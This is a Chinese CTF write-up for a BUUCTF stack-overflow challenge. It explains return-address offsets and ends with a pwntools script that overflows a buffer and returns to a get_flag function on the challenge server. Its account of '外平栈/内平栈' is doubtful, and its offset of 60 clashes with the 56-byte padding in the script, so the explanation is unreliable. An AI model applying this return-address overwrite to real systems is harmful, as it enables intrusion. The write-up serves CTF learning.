当前位置：首页 > wzjs >正文

淘宝返利网站建设百度seo营销网站

wzjs 2025/9/20 1:48:36

淘宝返利网站建设,百度seo营销网站,石家庄网站托管,自助建站系统源码下载栈溢出外平栈 1外平栈与内平栈的区别外平栈： 栈帧的局部变量和返回地址之间没有额外的对齐或填充。返回地址直接位于局部变量的上方（即栈顶方向）。在计算偏移时，不需要额外加 4（因为返回地址紧邻局部变量&#xff09…

栈溢出+外平栈

1外平栈与内平栈的区别

外平栈：
- 栈帧的局部变量和返回地址之间没有额外的对齐或填充。
- 返回地址直接位于局部变量的上方（即栈顶方向）。
- 在计算偏移时，不需要额外加 4（因为返回地址紧邻局部变量）。
内平栈：
- 栈帧的局部变量和返回地址之间可能存在对齐或填充（例如，编译器为了对齐而插入的额外空间）。
- 返回地址与局部变量之间有一定的距离。
- 在计算偏移时，需要额外加 4（或其他值，具体取决于对齐方式）。

2. `add esp, 3Ch; retn` 的作用

add esp, 3Ch：释放栈上分配的 60 字节空间（3Ch = 60）。
retn：从栈顶弹出返回地址并跳转到该地址。

在漏洞利用中，这两条指令通常用于调整栈指针并返回到攻击者控制的地址。

3. 外平栈与内平栈的偏移计算

假设有以下栈布局：

外平栈布局：

+-----------------+
| 局部变量        |  <- esp + 0
+-----------------+
| 返回地址        |  <- esp + 60 (3Ch)
+-----------------+

局部变量与返回地址之间没有额外空间。
在计算偏移时，直接使用 offset = 60，不需要额外加 4。

内平栈布局：

+-----------------+
| 局部变量        |  <- esp + 0
+-----------------+
| 对齐填充        |  <- esp + 60 (3Ch)
+-----------------+
| 返回地址        |  <- esp + 64 (40h)
+-----------------+

局部变量与返回地址之间有 4 字节的对齐填充。
在计算偏移时，需要额外加 4，即 offset = 64。

from pwn import *
io = remote("node5.buuoj.cn",28027)
payload = b'a'*56
# get_flag_addr:0x080489A0,exit_addr:0x0804E6A0
payload += p32(0x080489A0) + p32(0x0804E6A0) 
payload += p32(0x308CD64F) + p32(0x195719D1)
io.sendline(payload)
io.interactive()